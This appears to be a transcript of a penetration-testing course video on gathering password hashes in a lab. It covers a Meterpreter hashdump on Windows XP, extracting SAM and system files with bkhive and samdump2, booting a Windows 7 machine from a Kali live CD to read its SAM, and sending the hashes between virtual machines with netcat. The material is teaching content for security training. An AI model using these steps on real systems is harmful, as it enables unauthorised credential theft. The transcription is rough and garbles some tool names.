Okay, naturally we need some password hashes if we're going to do password attacks. So we didn't go over this again, but do remember that we have this MS08067 vulnerability on XP. '76 and exploits. That's an easy system level attack here. We get Meterpreter, and one of our options in Meterpreter is hash dump. We can dump out our password hashes if we have sufficient privileges. This gives us our password hashes, and we can, of course, save these to a file. I already did. It's Windows hashes.txt. Likewise, we have, from our previous section, our Linux hashes. We were able to get root privileges. I added some additional users here, besides just the ones that are default. So you see there's a few more. I encourage you to do the same. Varying degrees of password complexity. We also have our FileZilla XML. So this has some MD5 hashed passwords on here, like here's one. We also have our SAM and system file that we downloaded with Zervit. What we need to do to open that, it is a backup, so it may not be as useful as we want it to be. So we can do BK Hive on the system file. So that's going to get a key out of the system file to use to open the SAM. So I'll call it syskey.txt. We want to do pwdump. Let's do samdump. Samdump too. pwdump is a little different. So samdump2 and sam and syskey.txt. We'll open up that SAM file, and we just have administrator. We don't have any of the newer created users, so our backup is not as helpful as we would want. We would rather use these. So we've got passwords for a service, we've got passwords for XP, we've got passwords for Linux. We don't have passwords for Windows 7. We haven't been able to get a session on there yet. In the next section, we'll look at client-side attacks, which will allow us to get access to our Windows 7 system. We will get system-level access in some cases. So let's take a look at another option for now. What I did was I rebooted my Windows 7 system with the Kali Linux ISO, so it's live CD in the DVD drive, and I put it into BIOS mode, which I think was F12 maybe, and I just want to make the CD-ROM drive my first choice, so it's going to boot from the CD. And it says F10 for save and exit. So now it'll boot up Kali Linux. So this should give us access to our Windows system. When we boot up the Windows system, the SAM file is going to be protected. We won't just be able to look at it, but if we boot up with a Linux Live CD, we can mount that hard drive, so we'll have access to all the files, but file permissions and things won't be in place. So this will allow us to basically look at any file that we want on our Windows system, including password files. So again, I used the ISO. So if you used a pre-built image of Kali, you will need to download an ISO, and it doesn't have to be Kali. You can get live CDs of Ubuntu, plenty of other things, so feel free to do that. So I want to go to mount. There's nothing in mount. What is it going to be? Dev, maybe? SDA. entirely sure where it puts it. Let's look in here. Oh, we can just do that. Should put it somewhere there. There. Nice. Here we go. Should tell me what this is. Properties. Media. Yep. So I got a media. There we go. There is our disk. So we want to go to Windows, System 32. This is file address. Yeah. Gets me every time. And we should be able to find our SAM. In our system file around here somewhere. See all of System 32 here. Of course, it's not going to have it referenced. Well, rather than lose the video, since my mind is going blank, well, I'm probably not going to have internet access either. Where is the SAM file? Windows 7. Can you be more slower? Not helpful. Config the cd config. There it is right there. So SAM and system are here, so we can do the same thing here. So we can CK hive. And we want system, and let's call it root sys key.text. And then sam.2, so we nicely have all these utilities on here. Sam root sys key.text. So there are our password hashes. So hopefully I can copy these between the two VMs. It'll make my life easier, though I could certainly do a netcat between them if I have to. So I have a couple of additional users on here as well. And Windows 7 hashes. Text. There we go. So you'll notice a little bit of difference between the two, like between this one. That's not right. That's still the XP hashes, so it didn't let me copy. Confound it all. Okay, netcat LVP 1234 into Windows 7 hashes .text. I sure hope I have an IP address. I do. Cool. Alright, so I want a netcat 192.168.1.77. port 1234 input. Well, I didn't save it to a file, did I? Should probably save it to a file first. And output that into root. Windows 7 hashes.text. Cat root Windows 7 hashes.text. Perfect. Now I want my netcat 192.168.1.77. 1234 input root Windows 7 hashes.text. Certainly worthwhile to remember our netcat here. Kill this and nano Windows 7 hashes.text. There we go. Hooray. So I don't have to Google my way out of that one because I blanked on the word config, which is a little bit embarrassing, but these sorts of things will happen to you. It only matters, can you get yourself out of it? Google is always your friend. So this is another way we can get access to password hashes, unless someone sets a BIOS password. If you do have physical access to machines, you can use this technique. I've certainly used it on Pentest before. You might say, oh, that's kind of cheating. But if you have physical access, and certainly insider threats do, and if you can get past the security guard, I've done some night testing where I've caught the security guard sleeping and took a picture and put it in my report, sort of thing. So, it may be possible to have this in scope. So it's worth knowing. Though again, we could get these password hashes from our Windows 7 system through a client-side attack, which we'll see a bit later on. We've got lots of password hashes to play with. But before we do password hash cracking, I actually want to take a look at something a little different. We want to actually do a live attack against some services, but we'll do that in the next video.